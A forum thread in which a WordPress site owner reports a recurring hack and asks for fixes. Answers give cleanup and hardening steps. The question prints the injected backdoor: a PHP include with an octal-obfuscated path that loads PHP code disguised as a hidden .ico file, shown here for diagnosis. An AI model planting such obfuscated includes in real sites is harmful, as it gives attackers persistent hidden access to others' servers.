Reputation: 2947
Wordpress site hacked?
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
- WP Admin URL and put strong password username
- changed cpanel/FTP password with strong one
- Implemented iTheme Security
- Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Upvotes: 2
Views: 4120
Answers (3)
Reputation:
I faced this problem too, and step by step I did the steps below:
- Cleaning the injected code, manually
- Changing all the passwords
- Hiding the WP admin dashboard URL
- Limiting the login attempts
- Installing security plugins (Sucuri, Wordfence security)
- Contracting with Sucuri plan The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually. you can also visit this link too https://naderzad.info/web-development/wordpress-code-injection/
Upvotes: 1
Reputation: 476
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
- Backup the whole installation (just in case)
- Download the complete wp-content/uploads folder
- Make a Screenshot or save the page with the currently active plugins
- Delete ALL files
- Get a fresh wordpress setup and extract it
- Download a fresh copy of your theme and child-theme (recreate the previous setup)
- Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
- Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
- Reinstall all plugins, fresh downloads
Upvotes: 2
Reputation: 133
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this. At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article: https://codex.wordpress.org/FAQ_My_site_was_hacked And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/ http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Upvotes: 8
Related Questions
- My wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done
- My website has been hacked: what do I do now?
- Wordpress Site Keeps Getting Hacked
- Are my websites hacked?
- WordPress Website Comprimised Hack
- How to clean a hacked wordpress site
- WordPress hack attempt
- Analyzing possible WordPress hacking
- has my wordpress site been hacked? was it a plugin?
- Did my site get hacked?